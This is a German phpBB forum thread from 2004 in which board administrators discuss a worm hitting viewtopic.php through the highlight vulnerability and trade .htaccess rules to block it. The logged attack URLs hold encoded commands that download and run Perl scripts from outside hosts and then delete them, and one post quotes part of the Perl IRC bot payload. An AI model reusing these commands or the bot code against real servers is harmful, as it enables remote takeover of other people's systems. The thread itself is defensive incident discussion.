komische Viewtopic-Links ???

phpBB 3.0 Mods · Beitrag von **hackepeter13** » 25.12.2004 22:13

Hi,

ich hab den chCounter 2.3 (ich glaub von Christoph ist der), auf jedenfall kann man da auf die Zahl hinter "jetzt online" klicken und es öffnet sich ein PopUp mit einer Liste, der Usern, die gerade auf meiner Seite sind und in welcher Datei die sich gerade befinden.

Neuerding sind da komische Links wie:

/viewtopic.php?t=73&rush=%65%63%68%6F% 20%5F%53%54%41%52%54%5F%3B%20cd%20/var /tmp;wget%20www.h4ck3rsbr.net/Virus.tx t;perl%20Virus.txt;wget%20locais.v10.c om.br/w;perl%20w;rm%20-rf%20w*;rm%20-r f%20Virus*%3B%20%65%63%68%6F%20%5F%45% 4E%44%5F&highlight=%2527.%7

oder

/viewtopic.php?t=240&rush=%65%63%68%6F %20%5F%53%54%41%52%54%5F%3B%20cd%20/va r/tmp;wget%20www.h4ck3rsbr.net/Virus.t xt;perl%20Virus.txt;wget%20locais.v10. com.br/w;perl%20w;rm%20-rf%20w*;rm%20- rf%20Virus*%3B%20%65%63%68%6F%20%5F%45 %4E%44%5F&highlight=%2527.%

oder auch

/viewtopic.php?t=240&highlight=%2527%2 52esystem(chr(99)%252echr(100)%252echr (32)%252echr(47)%252echr(116)%252echr( 109)%252echr(112)%252echr(59)%252echr( 119)%252echr(103)%252echr(101)%252echr (116)%252echr(32)%252echr(119)%252echr (119)%252echr(119)%252echr(

Bis jetzt ist es immer eine Viewtopic, wenn man drauf klickt öffnet sich auch das Thema.
Die IP-Adressen sind auch immer anders.

Wie kommen solche Links zustande?

Nico Haase · Beitrag von **Nico Haase** » 25.12.2004 22:31

da versucht jemand, dein board zu hacken. solltest du also noch nicht die version 2.0.11 installiert haben, hol das schnell nach, und hab immer ein auge auf die vorgänge

phpBB 3.0 Mods · Beitrag von **hackepeter13** » 25.12.2004 22:47

Version 2.0.11 ist schon seit genau ein Monat drauf, hab ich ja nochmal glück gehabt

Das ist zur Zeit ganz schön extreme!

Nico Haase · Beitrag von **Nico Haase** » 25.12.2004 22:54

jupp. ich fürchte, dass die z.t. sehr großen verzögerungen heute auf phpbb.de auch was damit zu tun haben könnten

phpBB 3.0 Mods · Beitrag von **hackepeter13** » 25.12.2004 22:58

Ja denke auch, hab mich schon gefundert, was hier los ist, bei den "Master of phpBB"

Hab mir mal aus dem Link die URL genommen: http://forum.h4ck3rsbr.net/ - ist auch ein phpBB Forum.
Und: http://www.h4ck3rsbr.net/Virus.txt

Jürgen H. · Beitrag von **Jürgen H.** » 26.12.2004 00:49

Tja, habe diese Hacker eben auch im Forum.

Sie versuchen, über die viewtopic-Sicherheitslücke das Board zu hacken. Url sieht ähnlich aus, wie die von hackepeter bereits gepostete:

/viewtopic.php?t=2409&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/var/tmp;wget%20www.h4ck3rsbr.net/Virus.txt;perl%20Virus.txt;wget%20locais.v10.com.br/w;perl%20w;rm%20-rf%20w*;rm%20-rf%20Virus*%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.
User-Agent: LWP::Simple/5.800, wobei sich die Zahl /5.800 bei nahezu jedem Seitenaufruf verändert.

/viewtopic.php?t=2563&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/var/tmp;wget%20www.h4ck3rsbr.net/Virus.txt;perl%20Virus.txt;wget%20locais.v10.com.br/w;perl%20w;rm%20-rf%20w*;rm%20-rf%20Virus*%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527
IP: 82.165.43.50
Host: p15163234.pureserver.info

Die Host-Angaben ändern sich auch laufend, eigentlich bei jeder Anfrage, ebenso wie die IP-Adressen; mit Sperren läuft da nichts.

Die Virus-Txt habe ich mir auch angesehen. Scheinbar wird hier versucht, über einen IRC-Channel in Kombination mit den Usernamen die highlight-Sicherheitslücke auszunutzen.

Code: Alles auswählen

#!/usr/bin/perl
################ CONFIGURACAO #################################################################
my $processo = 'apache';  # Nome do processo que vai aparece no ps       #
#----------------------------------------------################################################
my $MODOME='+p';                               #  Modo Do Bot                                 #                   
#----------------------------------------------################################################
my $linas_max='10';                            # Evita o flood :) depois de X linhas          #
#----------------------------------------------################################################
my $sleep='3';                                 # ele dorme X segundos                         #
##################### IRC #####################################################################
my @adms=("Shell");	                       # Nick do administrador                        #
#----------------------------------------------################################################
my @canais=("#Virus :sp4m2005");# Canais                                       #
#----------------------------------------------################################################
my $nick='Virus_';                           # Nick do bot. Caso esteja em uso vai aparecer #
#                                              # aparecer com numero radonamico no final      #
#----------------------------------------------################################################
my $ircname = 'ViruS';                      # User ID                                      #
#----------------------------------------------################################################
my $realname = '1Admin14: 1O_Psicopata_';                                     #
#----------------------------------------------################################################
$servidor='irc.gigachat.net' unless $servidor; # Servidor de irc que vai ser usado            #
#                                              # caso não seja especificado no argumento      #
#----------------------------------------------################################################
my $porta='6667';	                       # Porta do servidor de irc                     #
################ ACESSO A SHELL ###############################################################
my $secv = 1;	                               # 1/0 pra habilita/desabilita acesso a shell   #
###############################################################################################

my $VERSAO = '1.0';

$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';

use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);

our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();

etc. etc. (ein Auszug), ich hab mir die Virus.txt mal runtergeladen.

Mit einer .htaccess-Anweisung wird man da wohl nichts erreichen können, oder?
Ich meine die hier:
RewriteEngine On
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527
RewriteRule ^.*$ - [F,L]

Oder Larsneos version:
RewriteCond %{QUERY_STRING} highlight=(.*)esystem\(chr\(
RewriteRule (.*) - [F]

Jürgen H. · Beitrag von **Jürgen H.** » 26.12.2004 01:18

Betreffend des User-Agents LWP hab ich rausgefunden, dass es sich um einen default-Agent eines beliebigen Perl-Modules handelt. In diesem Fall desjenigen, von dem der Angriff auf die Seiten unternommen wird.

Bekannte User-Agents könnte man aber über mod_rewrite vom Forum abhalten. Stimmt meine Überlegung, dass man so die Anfragen unterbinden könnte?

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^lwp-trivial/ [OR]
RewriteRule .* - [F,L]

Beitrag von **andreasOymann** » 26.12.2004 01:36

Seit Einfügen folgender Rules ist bei mir Ruhe:

Code: Alles auswählen

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT}   ^lwp.* [NC]
RewriteRule ^(.*)                -   [F]
 
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 
RewriteRule ^.*$   -   [F] 

RewriteCond %{QUERY_STRING} highlight=(.*)esystem\(chr\( 
RewriteRule (.*) - [F]

Andreas

Jürgen H. · Beitrag von **Jürgen H.** » 26.12.2004 02:07

andreasOymann hat geschrieben:Seit Einfügen folgender Rules ist bei mir Ruhe:

Code: Alles auswählen

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT}   ^lwp.* [NC]
RewriteRule ^(.*)                -   [F]
 
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 
RewriteRule ^.*$   -   [F] 

RewriteCond %{QUERY_STRING} highlight=(.*)esystem\(chr\( 
RewriteRule (.*) - [F]

Andreas

Ah, das tut gut! Danke, die Kretzen sind weg, funktioniert

Was, wenn sich das highlight=\%2527 in der Anfrage ändert?

Lg
Jürgen

BZebra · Beitrag von **BZebra** » 26.12.2004 02:07

Ich hab durch diesen www.h4ck3rsbr.net-Wurm für gestern den 5-fachen Traffik!!!!! 500 MB!!! Und keine Ahnung ob der Wurm überhaupt den ganzen Tag schon aktiv war. Einige der URLs hat er jetzt schon über 1000 mal aufgerufen.

Hab zwar 50 GB Traffik, aber wenn das noch schlimmer wird, dann ist er bald alle.

Wo muss ich den Code da oben Einfügen?